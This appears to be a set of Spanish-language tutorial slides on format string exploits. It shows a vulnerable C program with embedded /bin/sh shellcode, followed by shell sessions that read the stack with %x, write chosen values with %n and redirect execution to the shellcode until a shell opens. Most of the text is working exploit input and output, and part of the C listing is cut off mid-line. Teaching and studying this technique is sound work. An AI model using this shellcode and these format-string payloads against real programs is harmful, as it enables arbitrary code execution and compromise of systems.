Format string exploits
Caso practico
Emilio Mira
Programa ejemplo
#include
#include
char prompt[]="Hello world.";
char shellcode[]="\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
unsigned int num = 0;
int a, b, c, d;
void func(char *);
char str[] = "Hola";
void main(int argc, char *argv[])
{
char fstring[200];
int len;
if (argc != 2)
{
printf("don't forget the format string!\n");
exit(1);
}
len = strlen(argv[1]);
strncpy(fstring, argv[1], (len '
080a3074 :
[emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%x
Num: 0
Inner funcAAAAt0
808f121bffff728804864c020415bffff818804828abffff74002c80a41c080a41c0c2c2b41414141.80a3074
Inner func
Num: 0
[emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n
Num: 0
Inner funcAAAAt0
808f121bffff728804864c020415bffff818804828abffff74002b80a41c080a41c0c2b2a41414141
Inner func
Num: 59
Modificar memoria 2
[emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA$'\x74\x30\x0a\x08'AAAA\
$'\x74\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%u%n
Num: 0
Inner funcAAAAt0
AAAAt0
AAAAt0
AAAAt0
808f121bffff718804864c020415bffff808804828abffff73004380a41c080a41c0c43421094795585
Inner func
Num: 73
[emilio@vega fstring]$ ./findaddr -115 0x12345678
Address: 0x12345678
Bytes written so far: 0x68/104
Total length: 0x234/564
Pad1: 0xf/15 Pad2: 0xde/222 Pad3: 0xde/222 Pad4: 0xde/222
emilio@vega fstring]$ ./fs1 AAAA$'\x74\x30\x0a\x08'AAAA$'\x75\x30\x0a\x08'AAAA$'\x76\x30\x0a\x08'AAAA\
$'\x77\x30\x0a\x08'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%15u%n%222u%n%222u%n%222u%n
Num: 0
Inner funcAAAAt0
AAAAu0
AAAAv0
AAAAw0
808f121bffff6f8804864c020415bffff7e8804828abffff71005a80a41c080a41c0c5a59 1094795585
1094795585
1094795585
1094795585
Inner func
Num: 12345678
[emilio@vega fstring]$
Format string exploit
[emilio@vega fstring]$ objdump -D fs1 | grep shellcode
080a3040 :
80a3040: eb 24 jmp 80a3066
80a3066: e8 d7 ff ff ff call 80a3042
[emilio@vega fstring]$ ./findaddr -115 0x080a3040
Address: 0x80a3040
Bytes written so far: 0x68/104
Total length: 0x30a/778
Pad1: 0xd7/215 Pad2: 0xf0/240 Pad3: 0xda/218 Pad4: 0xfe/254
[emilio@vega fstring]$ ./fs1 AAAA$'\xfc\xf6\xff\xbf'AAAA$'\xfd\xf6\xff\xbf'AAAA$'\xfe\xf6\xff\xbf'AAAA\
$'\xff\xf6\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%n
Num: 0
Inner
funcAAAA����AAAA����AAAA����AAAA����808f121bffff6f8804864c020415bffff7e88048
28abffff71005b80a41c080a41c0c5b5a
1094795585
1094795585
1094795585
1094795585
Inner func
Num: 0
[emilio@vega fstring]$ ./fs1 AAAA$'\xec\xf7\xff\xbf'AAAA$'\xed\xf7\xff\xbf'AAAA$'\xee\xf7\xff\xbf'AAAA\
$'\xef\xf7\xff\xbf'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%215u%n%240u%n%218u%n%254u%n
Num: 0
Inner
funcAAAA����AAAA����AAAA����AAAA����808f121bffff6f8804864c020415bffff7e88048
28abffff71005b80a41c080a41c0c5b5a
1094795585
1094795585
1094795585
1094795585
Inner func
Num: 0
sh-2.05b$